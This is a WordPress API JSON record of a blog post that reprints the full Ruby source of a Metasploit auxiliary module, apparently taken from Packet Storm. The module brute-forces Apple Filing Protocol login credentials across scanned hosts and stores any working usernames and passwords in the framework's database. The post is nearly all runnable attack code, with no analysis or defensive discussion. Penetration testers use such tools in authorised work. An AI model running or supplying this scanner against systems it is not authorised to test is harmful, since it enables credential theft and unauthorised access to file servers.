{"id":59324,"date":"2024-09-01T01:50:33","date_gmt":"2024-08-31T22:50:33","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180923\/afp_login.rb.txt"},"modified":"2024-09-01T01:50:33","modified_gmt":"2024-08-31T22:50:33","slug":"apple-filing-protocol-login-utility","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/apple-filing-protocol-login-utility\/","title":{"rendered":"Apple Filing Protocol Login Utility"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

require ‘openssl’
require ‘metasploit\/framework\/credential_collection’
require ‘metasploit\/framework\/login_scanner\/afp’<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
include Msf::Exploit::Remote::AFP<\/p>\n

def initialize(info={})
super(update_info(info,
‘Name’ => ‘Apple Filing Protocol Login Utility’,
‘Description’ => %q{
This module attempts to bruteforce authentication credentials for AFP.
},
‘References’ =>
[
[ ‘URL’, ‘https:\/\/web.archive.org\/web\/20130309051753\/https:\/\/developer.apple.com\/library\/mac\/#documentation\/Networking\/Reference\/AFP_Reference\/Reference\/reference.html’ ],
[ ‘URL’, ‘https:\/\/developer.apple.com\/library\/mac\/documentation\/networking\/conceptual\/afp\/AFPSecurity\/AFPSecurity.html’ ]\n

],
‘Author’ => [ ‘Gregory Man <man.gregory[at]gmail.com>’ ],
‘License’ => MSF_LICENSE
))<\/p>\n

register_options(
[
Opt::Proxies,
OptInt.new(‘LoginTimeOut’, [ true, “Timeout on login”, 23 ]),
OptBool.new(‘RECORD_GUEST’, [ false, “Record guest login to the database”, false]),
OptBool.new(‘CHECK_GUEST’, [ false, “Check for guest login”, true])
], self)
end<\/p>\n

def run_host(ip)
print_status(“Scanning IP: #{ip.to_s}”)<\/p>\n

cred_collection = build_credential_collection(
username: datastore[‘USERNAME’],
password: datastore[‘PASSWORD’],
)<\/p>\n

scanner = Metasploit::Framework::LoginScanner::AFP.new(
configure_login_scanner(
host: ip,
port: rport,
proxies: datastore[‘PROXIES’],
cred_details: cred_collection,
stop_on_success: datastore[‘STOP_ON_SUCCESS’],
bruteforce_speed: datastore[‘BRUTEFORCE_SPEED’],
connection_timeout: 30,
max_send_size: datastore[‘TCP::max_send_size’],
send_delay: datastore[‘TCP::send_delay’],
framework: framework,
framework_module: self,
ssl: datastore[‘SSL’],
ssl_version: datastore[‘SSLVersion’],
ssl_verify_mode: datastore[‘SSLVerifyMode’],
ssl_cipher: datastore[‘SSLCipher’],
local_port: datastore[‘CPORT’],
local_host: datastore[‘CHOST’])
)<\/p>\n

scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
module_fullname: self.fullname,
workspace_id: myworkspace_id
)
if result.success?
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)<\/p>\n

print_good “#{ip}:#{rport} – Login Successful: #{result.credential}”
else
invalidate_login(credential_data)
vprint_error “#{ip}:#{rport} – LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})”
end
end
end<\/p>\n

end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## require ‘openssl’require ‘metasploit\/framework\/credential_collection’require ‘metasploit\/framework\/login_scanner\/afp’ class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::AuthBruteinclude Msf::Exploit::Remote::AFP def initialize(info={})super(update_info(info,‘Name’ => ‘Apple Filing Protocol Login Utility’,‘Description’ => %q{This module attempts to bruteforce authentication credentials for AFP.},‘References’ =>[[ ‘URL’, ‘https:\/\/web.archive.org\/web\/20130309051753\/https:\/\/developer.apple.com\/library\/mac\/#documentation\/Networking\/Reference\/AFP_Reference\/Reference\/reference.html’ ],[ ‘URL’, ‘https:\/\/developer.apple.com\/library\/mac\/documentation\/networking\/conceptual\/afp\/AFPSecurity\/AFPSecurity.html’ ] ],‘Author’ => [ ‘Gregory Man <man.gregory[at]gmail.com>’ ],‘License’ => MSF_LICENSE)) …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59324","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59324"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59324\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59324"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59324"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}